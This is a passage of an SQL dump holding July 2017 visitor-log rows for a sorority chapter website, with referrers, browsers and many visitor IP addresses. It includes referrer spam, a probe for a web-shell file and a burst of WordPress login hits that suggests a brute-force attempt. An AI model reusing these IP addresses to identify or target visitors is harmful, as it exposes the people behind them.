indows','6.0','','178.137.4.41','000',3,0),(6828,'2017-07-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',2,0),(6829,'2017-07-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','79.11.186.69','000',1,0),(6830,'2017-07-03','http://zphiblgz.org','ZoomBot','Unknown','Unknown','','79.11.186.69','000',1,0),(6831,'2017-07-03','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',3,0),(6832,'2017-07-03','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(6833,'2017-07-03','http://zphiblgz.org','MSIE','Windows','11.0','','137.200.32.6','000',3,0),(6834,'2017-07-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.67.128','000',2,0),(6835,'2017-07-03','http://www.pechikamini.ru/','Opera','Windows','8.00','','46.118.117.158','000',1,0),(6836,'2017-07-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(6837,'2017-07-03','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.27','000',1,0),(6838,'2017-07-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.26','000',1,0),(6839,'2017-07-03','http://nac-bearings.ru/','MSIE','Windows','7.0b','','46.118.117.158','000',1,0),(6840,'2017-07-03','http://zphiblgz.org','Firefox','Windows','40.1','','101.174.137.116','000',1,0),(6841,'2017-07-03','http://zphiblgz.org','Firefox','Windows','40.1','','120.29.76.64','000',1,0),(6842,'2017-07-03','http://zphiblgz.org','Firefox','Macintosh','3.6.2','','192.99.4.98','000',1,0),(6843,'2017-07-03','http://zphiblgz.org','Firefox','Linux','53.0','','192.99.4.98','000',1,0),(6844,'2017-07-04','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(6845,'2017-07-04','http://zphiblgz.org','Firefox','Windows','40.1','','92.203.3.25','000',1,0),(6846,'2017-07-04','http://zphiblgz.org','MSIE','Windows','6.0','','78.153.151.57','000',1,0),(6847,'2017-07-04','http://zphiblgz.org','Firefox','Windows','40.1','','105.110.33.53','000',1,0),(6848,'2017-07-04','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.20','000',2,0),(6849,'2017-07-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(6850,'2017-07-04','http://www.zphiblgz.org','Firefox','Macintosh','29.0','','45.55.128.239','000',2,0),(6851,'2017-07-04','http://zphiblgz.org','Firefox','Windows','21.0','','45.55.128.239','000',2,0),(6852,'2017-07-04','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','45.55.128.239','000',2,0),(6853,'2017-07-04','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','45.55.128.239','000',3,0),(6854,'2017-07-04','http://zphiblgz.org','MSIE','Windows','10.0','','45.55.128.239','000',1,0),(6855,'2017-07-04','http://zphiblgz.org','Chrome','Macintosh','34.0.1847.131','','45.55.128.239','000',1,0),(6856,'2017-07-04','http://www.zphiblgz.org','Firefox','Windows','28.0','','138.197.3.83','000',4,0),(6857,'2017-07-04','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','138.197.3.83','000',3,0),(6858,'2017-07-04','http://zphiblgz.org','Firefox','Windows','29.0','','138.197.3.83','000',1,0),(6859,'2017-07-04','http://zphiblgz.org','Firefox','Windows','21.0','','138.197.3.83','000',1,0),(6860,'2017-07-04','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.3.83','000',1,0),(6861,'2017-07-04','http://zphiblgz.org','MSIE','Windows','9.0','','138.197.3.83','000',1,0),(6862,'2017-07-04','http://zphiblgz.org','Firefox','Windows','46.0','','89.44.25.13','000',1,0),(6863,'2017-07-04','http://zphiblgz.org','Firefox','Windows','46.0','','85.204.174.95','000',1,0),(6864,'2017-07-04','http://zphiblgz.org','MSIE','Windows','11.0','','142.54.161.10','000',4,0),(6865,'2017-07-04','http://zphiblgz.org','Firefox','Windows','46.0','','213.184.96.115','000',1,0),(6866,'2017-07-04','http://zphiblgz.org','Chrome','Macintosh','34.0.1847.131','','138.197.111.36','000',2,0),(6867,'2017-07-04','http://zphiblgz.org','Firefox','Windows','38.0','','195.22.127.140','000',1,0),(6868,'2017-07-04','http://kemerovo.zrus.org/','Opera','Windows','7.02','','46.118.125.174','000',2,0),(6869,'2017-07-04','https://xn--d1aifoe0a9a.top/','MSIE','Windows','6.0','','46.118.125.174','000',7,0),(6870,'2017-07-04','https://www.bing.com/','Edge','Windows','14.14393','','99.14.250.200','000',4,0),(6871,'2017-07-04','http://zphiblgz.org','Firefox','Windows','40.1','','5.2.136.188','000',2,0),(6872,'2017-07-04','http://zphiblgz.org','Firefox','Windows','40.1','','178.237.210.47','000',2,0),(6873,'2017-07-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.84.108','000',1,0),(6874,'2017-07-04','http://zphiblgz.org','Firefox','Windows','40.1','','120.28.191.12','000',1,0),(6875,'2017-07-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.169','000',1,0),(6876,'2017-07-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','72.52.75.27','000',1,0),(6877,'2017-07-04','https://link.ac/','MSIE','Windows','7.0','','46.118.117.158','000',1,0),(6878,'2017-07-04','http://zphiblgz.org','MSIE','Windows','5.0','','128.177.10.232','000',2,0),(6879,'2017-07-04','http://zphiblgz.org','MSIE','Windows','6.0','','89.28.24.190','000',1,0),(6880,'2017-07-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(6881,'2017-07-04','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',3,0),(6882,'2017-07-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.206','000',1,0),(6883,'2017-07-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','198.96.155.3','000',1,0),(6884,'2017-07-04','https://essayservicewriting.org/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(6885,'2017-07-04','http://xxxtubesafari.com/','Opera Next','Windows','43.0.2442.1144','','5.188.216.11','000',1,0),(6886,'2017-07-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.90','000',2,0),(6887,'2017-07-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',2,0),(6888,'2017-07-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',2,0),(6889,'2017-07-04','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','103.255.254.123','000',1,0),(6890,'2017-07-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','207.244.70.35','000',2,0),(6891,'2017-07-04','https://stop-gepatit.te.ua/','Opera','Windows','6.01','','178.137.4.41','000',3,0),(6892,'2017-07-05','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(6893,'2017-07-05','http://demian.kz/','MSIE','Unknown','6.0','','46.118.124.89','000',2,0),(6894,'2017-07-05','zphiblgz.org','Chrome','Windows','50.0.2661.75','','62.210.190.59','000',1,0),(6895,'2017-07-05','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.24.131','000',2,0),(6896,'2017-07-05','http://nippon-bearings.ru/','MSIE','Windows','6.0','','46.118.117.158','000',7,0),(6897,'2017-07-05','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.186.134','000',13,0),(6898,'2017-07-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','45.41.143.136','000',1,0),(6899,'2017-07-05','zphiblgz.org','Chrome','Windows','50.0.2661.75','','95.110.202.110','000',1,0),(6900,'2017-07-05','http://zphiblgz.org','MSIE','Windows','6.0','','62.75.195.67','000',3,0),(6901,'2017-07-05','http://chatroulette.video/','MSIE','Windows','7.0b','','46.118.124.89','000',2,0),(6902,'2017-07-05','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.185.0.83','000',130,0),(6903,'2017-07-05','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.15','000',3,0),(6904,'2017-07-05','http://podshipniki-nsk.ru/','Opera','Windows','7.0','','178.137.4.41','000',3,0),(6905,'2017-07-05','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.139','000',1,0),(6906,'2017-07-05','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.167.196','000',30,0),(6907,'2017-07-05','http://zphiblgz.org','Firefox','Windows','40.1','','150.129.196.63','000',2,0),(6908,'2017-07-05','http://zphiblgz.org','Firefox','Windows','46.0','','221.127.49.128','000',2,0),(6909,'2017-07-05','http://zphiblgz.org','Firefox','Windows','46.0','','2.187.60.100','000',1,0),(6910,'2017-07-05','http://zphiblgz.org','Firefox','Windows','46.0','','2.177.218.65','000',1,0),(6911,'2017-07-05','http://zphiblgz.org','Firefox','Windows','46.0','','125.161.72.100','000',1,0),(6912,'2017-07-05','http://zphiblgz.org','Firefox','Windows','46.0','','85.101.64.134','000',2,0),(6913,'2017-07-05','http://zphiblgz.org','Firefox','Windows','46.0','','89.228.25.26','000',4,0),(6914,'2017-07-05','http://zphiblgz.org','Firefox','Windows','46.0','','156.210.80.162','000',1,0),(6915,'2017-07-05','http://zphiblgz.org','Firefox','Windows','46.0','','190.177.138.235','000',1,0),(6916,'2017-07-05','http://zphiblgz.org','Firefox','Windows','46.0','','37.34.176.243','000',1,0),(6917,'2017-07-05','74.220.219.51','Firefox','Windows','33.0','','138.197.202.197','000',1,0),(6918,'2017-07-05','http://zphiblgz.org','Firefox','Windows','33.0','','159.203.42.143','000',1,0),(6919,'2017-07-05','https://2000k.ru/','Opera','Windows','6.01','','46.119.116.109','000',5,0),(6920,'2017-07-05','https://omoikiri-japan.ru/','Opera','Windows','8.01','','46.119.116.109','000',3,0),(6921,'2017-07-05','http://zphiblgz.org','Lynx','Unknown','2.8.9dev.1','','136.243.64.237','000',1,0),(6922,'2017-07-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.38.208.57','000',2,0),(6923,'2017-07-05','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','208.76.113.3','000',2,0),(6924,'2017-07-05','http://zphiblgz.org','Firefox','Windows','40.1','','202.92.148.252','000',2,0),(6925,'2017-07-05','http://chatroulette.world/','MSIE','Windows','6.0','','46.118.124.89','000',3,0),(6926,'2017-07-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.148.165.13','000',2,0),(6927,'2017-07-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.89','000',2,0),(6928,'2017-07-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.165.168.186','000',2,0),(6929,'2017-07-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(6930,'2017-07-05','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',5,0),(6931,'2017-07-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.54','000',1,0),(6932,'2017-07-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.105.100.149','000',2,0),(6933,'2017-07-05','http://zphiblgz.org','Firefox','Windows','40.1','','81.64.67.229','000',1,0),(6934,'2017-07-05','http://search.myway.com/search/GGweb.jhtml?p2=%5EBA5%5Exdm508%5ETTAB02%5Eus&ptb=6F648C0D-4629-4B77-9A12-E495C2C1EE87&n=7839EA24&ind=&cn=US&ln=en&si=49588_lasttry-GGG-US-MAIN-IE&tpr=hpsb&trs=wtt&brwsid=010af87c-93ee-4ce8-b9c2-12f3734d02d4&st=tab&searchfor=alumnae+chapter+zeta+phi+beta&pn=5&ots=1499287531488','MSIE','Windows','11.0','','12.23.51.34','000',1,0),(6935,'2017-07-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.213.8.236','000',2,0),(6936,'2017-07-05','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.137','000',2,0),(6937,'2017-07-05','http://zphiblgz.org','Firefox','Windows','40.1','','218.235.187.19','000',1,0),(6938,'2017-07-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.124','000',1,0),(6939,'2017-07-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','83.92.47.99','000',2,0),(6940,'2017-07-05','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.16','000',1,0),(6941,'2017-07-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',2,0),(6942,'2017-07-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.124','000',4,0),(6943,'2017-07-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',1,0),(6944,'2017-07-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.139.8.104','000',1,0),(6945,'2017-07-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.101.137','000',1,0),(6946,'2017-07-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.162.216.5','000',2,0),(6947,'2017-07-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.61','000',1,0),(6948,'2017-07-05','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.99.140.130','000',1,0),(6949,'2017-07-05','http://zphiblgz.org','Firefox','Windows','40.1','','196.121.82.236','000',1,0),(6950,'2017-07-05','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(6951,'2017-07-05','https://maslenka.kz/','MSIE','Windows','6.0','','46.118.125.174','000',2,0),(6952,'2017-07-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.110.157.151','000',2,0),(6953,'2017-07-05','http://typer.one/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(6954,'2017-07-05','http://www.google.com/','Chrome','Android','58.0.3029.83','','174.205.60.23','000',2,0),(6955,'2017-07-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.182.18.40','000',2,0),(6956,'2017-07-06','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.0','000',1,0),(6957,'2017-07-06','http://zphiblgz.org','Firefox','Windows','40.1','','5.90.102.57','000',2,0),(6958,'2017-07-06','http://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','163.172.4.153','000',1,0),(6959,'2017-07-06','http://zphiblgz.org','Firefox','Windows','3.6.3','','52.19.157.199','000',1,0),(6960,'2017-07-06','http://zphiblgz.org','MSIE','Windows','6.0','','182.21.167.35','000',1,0),(6961,'2017-07-06','http://zphiblgz.org','MSIE','Windows','6.0','','188.233.82.252','000',1,0),(6962,'2017-07-06','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(6963,'2017-07-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.194.219.155','000',2,0),(6964,'2017-07-06','http://zphiblgz.org/wso.php','Chrome','Windows','42.0.2311.152','','195.154.251.162','000',1,0),(6965,'2017-07-06','http://zphiblgz.org','Firefox','Windows','40.1','','24.16.211.75','000',2,0),(6966,'2017-07-06','http://google.com','Chrome','Macintosh','33.0.1750.152','','104.198.64.64','000',1,0),(6967,'2017-07-06','http://zphiblgz.org','Firefox','Windows','40.1','','37.159.222.6','000',1,0),(6968,'2017-07-06','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.129','000',1,0),(6969,'2017-07-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.137','000',1,0),(6970,'2017-07-06','http://xn--e1afanlbnfckd7c3d.xn--p1ai/','MSIE','Unknown','7.0b','','46.118.117.158','000',3,0),(6971,'2017-07-06','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','194.187.249.29','000',3,0),(6972,'2017-07-06','http://zphiblgz.org','Firefox','Windows','40.1','','88.98.240.31','000',1,0),(6973,'2017-07-06','http://zphiblgz.org','Firefox','Windows','48.0','','93.120.211.106','000',1,0),(6974,'2017-07-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.124.32.84','000',2,0),(6975,'2017-07-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.215','000',2,0),(6976,'2017-07-06','http://video-chat.in/','MSIE','Windows','6.0','','46.118.125.174','000',5,0),(6977,'2017-07-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.207','000',1,0),(6978,'2017-07-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.210.37.82','000',1,0),(6979,'2017-07-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.2.75.199','000',2,0),(6980,'2017-07-06','http://www.zphiblgz.org','Chrome','Windows','34.0.1847.137','','159.203.105.15','000',3,0),(6981,'2017-07-06','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','159.203.105.15','000',3,0),(6982,'2017-07-06','http://zphiblgz.org','Firefox','Windows','29.0','','159.203.105.15','000',1,0),(6983,'2017-07-06','http://zphiblgz.org','MSIE','Windows','9.0','','159.203.105.15','000',2,0),(6984,'2017-07-06','http://zphiblgz.org','Safari','Macintosh','7.0.3','','159.203.105.15','000',1,0),(6985,'2017-07-06','http://zphiblgz.org','Firefox','Macintosh','29.0','','159.203.105.15','000',1,0),(6986,'2017-07-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.171.202.150','000',2,0),(6987,'2017-07-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(6988,'2017-07-06','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',4,0),(6989,'2017-07-06','https://stop-gepatit.te.ua/','MSIE','Windows','6.0','','178.137.4.41','000',2,0),(6990,'2017-07-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.182.106.190','000',2,0),(6991,'2017-07-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.37','000',1,0),(6992,'2017-07-06','http://zphiblgz.org','Firefox','Windows','52.0','','34.212.163.113','000',1,0),(6993,'2017-07-06','https://inome.com.ua/','Opera','Windows','7.0','','46.118.117.158','000',2,0),(6994,'2017-07-06','http://zphiblgz.org','Firefox','Windows','40.1','','41.249.222.16','000',2,0),(6995,'2017-07-06','http://podshipniki-nsk.ru/','Opera','Windows','9.00','','178.137.4.41','000',2,0),(6996,'2017-07-06','http://zphiblgz.org','Firefox','Windows','40.1','','191.37.72.15','000',1,0),(6997,'2017-07-06','http://coolwallpapers-hd.com/','Opera','Windows','7.11','','46.118.124.89','000',3,0),(6998,'2017-07-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.125','000',1,0),(6999,'2017-07-06','https://pregnant.guru/','MSIE','Windows','6.0','','46.118.117.158','000',1,0),(7000,'2017-07-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.246.21','000',1,0),(7001,'2017-07-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.37.18','000',2,0),(7002,'2017-07-07','http://zphiblgz.org','Firefox','Windows','40.1','','149.255.210.101','000',2,0),(7003,'2017-07-07','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(7004,'2017-07-07','http://freza-sverlo.ru/','Opera','Windows','6.0','','46.118.117.158','000',3,0),(7005,'2017-07-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.169.241','000',2,0),(7006,'2017-07-07','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.40.220','000',3,0),(7007,'2017-07-07','http://zphiblgz.org','Safari','Macintosh','7.0.3','','138.197.111.90','000',2,0),(7008,'2017-07-07','http://zphiblgz.org','Firefox','Windows','40.1','','83.58.52.73','000',2,0),(7009,'2017-07-07','http://zphiblgz.org','Firefox','Windows','40.1','','151.15.85.95','000',1,0),(7010,'2017-07-07','https://www.google.com/','Chrome','Macintosh','59.0.3071.115','','192.234.2.49','000',1,0),(7011,'2017-07-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.242.127','000',2,0),(7012,'2017-07-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.90','000',2,0),(7013,'2017-07-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.86','000',2,0),(7014,'2017-07-07','http://chatroulette.si/','Opera','Windows','7.11','','46.118.124.89','000',3,0),(7015,'2017-07-07','http://zphiblgz.org','Firefox','Windows','50.0','','201.18.18.173','000',5,0),(7016,'2017-07-07','http://zphiblgz.org','Firefox','Windows','40.1','','186.24.1.243','000',2,0),(7017,'2017-07-07','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','202.46.54.104','000',1,0),(7018,'2017-07-07','https://letsart.ru/','MSIE','Unknown','6.0','','46.119.116.109','000',5,0),(7019,'2017-07-07','http://zphiblgz.org','Firefox','Windows','40.1','','79.178.91.218','000',1,0),(7020,'2017-07-07','http://zphiblgz.org','Firefox','Windows','39.0','','185.26.239.125','000',2,0),(7021,'2017-07-07','http://zphiblgz.org','Firefox','Windows','21.0','','5.9.112.6','000',1,0),(7022,'2017-07-07','http://zphiblgz.org','Chrome','Macintosh','18.0.1025.166','','136.243.17.161','000',1,0),(7023,'2017-07-07','http://zphiblgz.org/contact/','Opera','Windows','12.16','','155.133.38.215','000',3,0),(7024,'2017-07-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(7025,'2017-07-07','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(7026,'2017-07-07','https://essayservicewriting.org/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(7027,'2017-07-07','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','54.175.38.243','000',1,0),(7028,'2017-07-07','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.139','000',1,0),(7029,'2017-07-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.9','000',1,0),(7030,'2017-07-07','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.130','000',1,0),(7031,'2017-07-07','https://xn--d1aifoe0a9a.top/','MSIE','Windows','6.0','','46.118.125.174','000',4,0),(7032,'2017-07-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.63','000',1,0),(7033,'2017-07-07','http://zphiblgz.org','Chrome','Windows','26.0.1410.58','','5.9.112.6','000',1,0),(7034,'2017-07-07','http://video-chat.love/','Opera','Windows','8.01','','46.118.124.89','000',1,0),(7035,'2017-07-07','http://perm-profnastil.ru/','MSIE','Windows','6.0','','46.118.124.89','000',1,0),(7036,'2017-07-07','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','184.72.141.187','000',1,0),(7037,'2017-07-07','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.249.80.4','000',2,0),(7038,'2017-07-07','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','74.243.223.55','000',4,0),(7039,'2017-07-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.244','000',2,0),(7040,'2017-07-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.59','000',13,0),(7041,'2017-07-08','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(7042,'2017-07-08','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(7043,'2017-07-08','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.130','000',1,0),(7044,'2017-07-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.126','000',1,0),(7045,'2017-07-08','http://zphiblgz.org','MSIE','Windows','9.0','','95.37.204.33','000',2,0),(7046,'2017-07-08','https://buy-meds24.com/','MSIE','Windows','6.0','','178.137.4.41','000',4,0),(7047,'2017-07-08','http://videochat.world/','Unknown','Unknown','Unknown','','46.118.125.174','000',2,0),(7048,'2017-07-08','http://yalta.zrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',3,0),(7049,'2017-07-08','http://typer.one/','MSIE','Windows','6.0','','37.229.253.71','000',2,0),(7050,'2017-07-08','http://your-bearings.com/','MSIE','Windows','5.5','','46.118.117.158','000',2,0),(7051,'2017-07-08','http://videochat.bz/','MSIE','Windows','6.0','','46.119.116.109','000',2,0),(7052,'2017-07-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(7053,'2017-07-08','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(7054,'2017-07-08','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.137','000',1,0),(7055,'2017-07-08','http://zphiblgz.org','Chrome','Windows','38.0.2125.78','','124.127.78.174','000',1,0),(7056,'2017-07-08','http://zphiblgz.org','Chrome','Windows','38.0.2125.78','','124.127.72.75','000',1,0),(7057,'2017-07-08','http://zphiblgz.org','Firefox','Windows','21.0','','136.243.17.161','000',1,0),(7058,'2017-07-08','http://www.pechikamini.ru/','MSIE','Windows','2.0','','46.118.117.158','000',2,0),(7059,'2017-07-08','http://zphiblgz.org','Firefox','Windows','40.1','','77.31.40.229','000',1,0),(7060,'2017-07-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.131','000',1,0),(7061,'2017-07-08','http://zphiblgz.org/','Firefox','Windows','7.0.1','','85.248.227.165','000',1,0),(7062,'2017-07-08','http://fr-bearings.ru/','MSIE','Windows','2.0d','','46.118.124.89','000',3,0),(7063,'2017-07-08','https://www.bing.com/','Safari','iPad','8.0','','68.134.1.62','000',4,0),(7064,'2017-07-08','http://zphiblgz.org','Firefox','Windows','40.1','','93.33.160.62','000',2,0),(7065,'2017-07-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.129.62.62','000',2,0),(7066,'2017-07-08','https://www.mb140.ru/','MSIE','Windows','6.0','','46.118.117.158','000',3,0),(7067,'2017-07-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','196.54.55.33','000',2,0),(7068,'2017-07-08','http://zphiblgz.org','Firefox','Linux','41.0','','104.227.162.109','000',2,0),(7069,'2017-07-08','http://zphiblgz.org','Firefox','Windows','40.1','','79.1.192.213','000',1,0),(7070,'2017-07-08','http://www.zphiblgz.org','Chrome','Windows','34.0.1847.131','','45.55.38.239','000',2,0),(7071,'2017-07-08','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','45.55.38.239','000',2,0),(7072,'2017-07-08','http://zphiblgz.org','MSIE','Windows','10.0','','45.55.38.239','000',1,0),(7073,'2017-07-08','http://zphiblgz.org','MSIE','Windows','9.0','','45.55.38.239','000',1,0),(7074,'2017-07-08','http://zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','45.55.38.239','000',2,0),(7075,'2017-07-08','http://zphiblgz.org','Safari','Macintosh','7.0.3','','45.55.38.239','000',1,0),(7076,'2017-07-08','http://zphiblgz.org','Firefox','Windows','29.0','','45.55.38.239','000',1,0),(7077,'2017-07-08','http://zphiblgz.org','Firefox','Windows','28.0','','45.55.38.239','000',1,0),(7078,'2017-07-09','http://videochat.ph/','MSIE','Windows','5.0','','46.119.116.109','000',2,0),(7079,'2017-07-09','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','216.19.213.95','000',1,0),(7080,'2017-07-09','http://zphiblgz.org','Firefox','Windows','19.0','','5.188.211.72','000',1,0),(7081,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','5.157.105.110','000',2,0),(7082,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','178.16.33.101','000',6,0),(7083,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','86.123.104.92','000',2,0),(7084,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','153.194.155.169','000',3,0),(7085,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','200.106.22.55','000',5,0),(7086,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','124.104.228.110','000',2,0),(7087,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','191.82.14.229','000',8,0),(7088,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','112.118.182.117','000',3,0),(7089,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','175.158.216.15','000',2,0),(7090,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','182.53.22.249','000',1,0),(7091,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','27.34.17.254','000',3,0),(7092,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','175.158.216.46','000',1,0),(7093,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','165.100.176.123','000',4,0),(7094,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','41.138.117.152','000',3,0),(7095,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','123.28.29.245','000',2,0),(7096,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','188.162.65.2','000',1,0),(7097,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','151.61.77.190','000',7,0),(7098,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','86.98.11.10','000',5,0),(7099,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','109.69.46.231','000',3,0),(7100,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','176.213.147.166','000',3,0),(7101,'2017-07-09','http://zphiblgz.org/wp-login.php','Firefox','